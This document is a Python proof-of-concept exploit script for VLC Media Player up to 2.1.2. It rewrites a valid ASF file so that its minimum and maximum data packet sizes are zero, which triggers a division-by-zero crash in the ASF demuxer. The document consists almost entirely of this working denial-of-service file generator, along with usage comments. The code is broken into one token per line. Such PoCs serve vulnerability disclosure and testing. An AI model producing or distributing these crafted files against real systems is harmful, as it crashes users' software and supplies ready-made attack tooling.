#!/usr/bin/python
# VLC Media Player up to 2.1.2 DOS POC Integer Division By zero in ASF Demuxer
# VLC Media Player is prone to DOS utilizing a division by zero error if minimium data packet size
# is equal to zero. this was tested on windows XP sp3 and affects all versions of vlc till latest 2.1.2
# to run this script you need to install python bitstring module
# usage you supply any valid asf and the script will produxe a POC asf that will crash vlc
import
sys
from
bitstring
import
BitArray
f
=
open
(sys.argv[
1
],
'r+b'
)
f.seek(
0
,
2
)
size
=
f.tell()
print
"[*] file size: %d"
%
size
f.seek(
0
,
0
)
print
"[*] ReeeeeWWWWWWiiiiiNNNNNNND"
fb
=
BitArray(f)
index
=
fb.find(
'0xa1dcab8c47a9cf118ee400c00c205365'
,bytealigned
=
True
)
print
"[*] found file properties GUID"
print
"[*] File properties GUID: %s"
%
fb[index[
0
]:(index[
0
]
+
128
)]
# index of minumum packet size in File Proprties header
i_min_data_pkt_size
=
index[
0
]
+
736
print
"[*] Original Minimum Data Packet Size: %s"
%
fb[i_min_data_pkt_size:i_min_data_pkt_size
+
32
].
hex
print
"[*] Original Maximum Data Packet Size: %s"
%
fb[i_min_data_pkt_size
+
32
:i_min_data_pkt_size
+
64
].
hex
# Accroding to ASF standarad the minimum data size and the maximum data size should be equal
print
"[*] Changing Miniumum and Maximum Data packet size to 0"
# changing the data packets in bit array
fb[i_min_data_pkt_size:i_min_data_pkt_size
+
8
]
=
0x00
fb[i_min_data_pkt_size
+
8
:i_min_data_pkt_size
+
16
]
=
0x00
fb[i_min_data_pkt_size
+
16
:i_min_data_pkt_size
+
24
]
=
0x00
fb[i_min_data_pkt_size
+
24
:i_min_data_pkt_size
+
32
]
=
0x00
fb[i_min_data_pkt_size
+
32
:i_min_data_pkt_size
+
40
]
=
0x00
fb[i_min_data_pkt_size
+
40
:i_min_data_pkt_size
+
48
]
=
0x00
fb[i_min_data_pkt_size
+
48
:i_min_data_pkt_size
+
56
]
=
0x00
fb[i_min_data_pkt_size
+
56
:i_min_data_pkt_size
+
64
]
=
0x00
print
"[*] POC File Created poc.asf"
of
=
open
(
'poc.asf'
,
'w+b'
)
fb.tofile(of)
of.close()
f.close()